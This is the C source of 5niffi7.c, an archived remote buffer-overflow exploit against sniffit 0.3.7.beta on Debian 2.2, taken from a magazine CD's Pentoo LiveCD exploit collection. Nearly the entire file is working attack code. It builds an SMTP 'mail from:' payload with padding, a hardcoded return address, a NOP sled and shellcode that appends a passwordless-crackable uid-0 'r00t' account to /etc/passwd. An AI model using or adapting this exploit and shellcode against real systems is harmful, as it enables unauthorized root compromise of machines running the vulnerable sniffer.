home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
application
/
networktools
/
5niffi7.c
< prev
next >
Wrap
C/C++ Source or Header
|
2005-02-12
|
4KB
|
128 lines
/*
* 5niffi7.c - exploiting sniffit 0.3.7.beta for Debian 2.2
* Copyright (C) 2000 Michel "MaXX" Kaempf <maxx@via.ecp.fr>
*
* When a running sniffit session logs the packet sent by 5niffi7,
* the following shellcode is executed. This shellcode adds the
* line "r00t:36msvq8vbkg5k:0:0:r00t:/:/bin/sh" to /etc/passwd.
* Cracking r00t's password should not be too hard :-)
*
* 5niffi7.c is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define FROM "mail from: "
#define RET 0xbfff6b5b
char shellcode[] =
"\xeb\x5b\x90\x90\x90\x90\x90\x90"
"\x90\x90\x5e\x80\x6e\xd9\x1a\x80"
"\x6e\xdd\x1a\x80\x6e\xd7\x1a\x80"
"\x6e\xc4\x1a\x80\x6e\xe4\x1a\x90"
"\x90\x90\x90\x31\xc0\x88\x60\x0b"
"\xb0\x05\x89\xf3\x31\xc9\x66\xb9"
"\x01\x04\x31\xd2\xcd\x80\x89\xc7"
"\xc6\x60\x31\x24\x31\xc0\x88\x60"
"\x32\xb0\x04\x89\xfb\x8d\x68\x0c"
"\x31\xd2\xb2\x26\xcd\x80\x31\xc0"
"\xb0\x06\x89\xfb\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xa8\xff"
"\xff\xff\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x78\x72\x30"
"\x30\x74\x3a\x33\x36\x6d\x73\x76"
"\x71\x38\x76\x62\x6b\x67\x35\x6b"
"\x3a\x30\x3a\x30\x3a\x72\x30\x30"
"\x74\x3a\x2f\x3a\x2f\x62\x69\x6e"
"\x2f\x73\x68\x78\x78";
int main( int argc, char * argv[] )
{
int sock_client;
struct sockaddr_in addr_server, addr_client;
int i, j;
char * ip_src, * ip_dst;
char conn[ 256 ], msg[ 1500 ];
if ( argc != 2 )
{
fprintf( stderr, "Usage: %s IP\n", argv[0] );
exit( -1 );
}
if ( (sock_client = socket(PF_INET, SOCK_STREAM, 0)) < 0 )
{
exit( -1 );
}
bzero( (void *)&addr_server, sizeof(struct sockaddr_in) );
addr_server.sin_family = AF_INET;
addr_server.sin_port = htons( 25 );
inet_aton( argv[1], &addr_server.sin_addr );
if ( connect(sock_client, (struct sockaddr *)&addr_server, sizeof(struct sockaddr_in)) < 0 )
{
exit( -1 );
}
i = sizeof( struct sockaddr );
getsockname( sock_client, (struct sockaddr *)&addr_client, &i );
ip_src = strdup( inet_ntoa(addr_client.sin_addr) );
ip_dst = strdup( inet_ntoa(addr_server.sin_addr) );
snprintf( conn, sizeof(conn), "%s.%u-%s.%u", ip_src, ntohs(addr_client.sin_port), ip_dst, ntohs(addr_server.sin_port) );
free( ip_src );
free( ip_dst );
bzero( msg, sizeof(msg) );
i = 0;
for ( j = 0; j < strlen(FROM); i++, j++ )
{
msg[ i ] = FROM[ j ];
}
for ( j = 0; j < 256 - strlen(conn) - strlen(": mail [") - strlen(FROM); i++, j++ )
{
msg[ i ] = 'A';
}
*((unsigned long *)(&(msg[i]))) = RET;
i += 4;
for ( j = 0; j < 1024; i++, j++ )
{
msg[ i ] = 0x90;
}
for ( j = 0; j < strlen(shellcode); i++, j++ )
{
msg[ i ] = shellcode[ j ];
}
if ( write(sock_client, msg, strlen(msg)) < 0 )
{
exit( -1 );
}
close( sock_client );
exit( 0 );
}
